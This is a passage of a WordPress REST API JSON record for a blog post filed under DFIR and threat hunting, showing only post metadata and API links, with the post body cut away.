code.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,13],"tags":[],"class_list":["post-362","post","type-post","status-publish","format-standard","hentry","category-dfir","category-threat-hunting"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/362","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=362"}],"version-history":[{"count":2,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/362\/revisions"}],"predecessor-version":[{"id":364,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/362\/revisions\/364"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=362"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=362"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=362"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}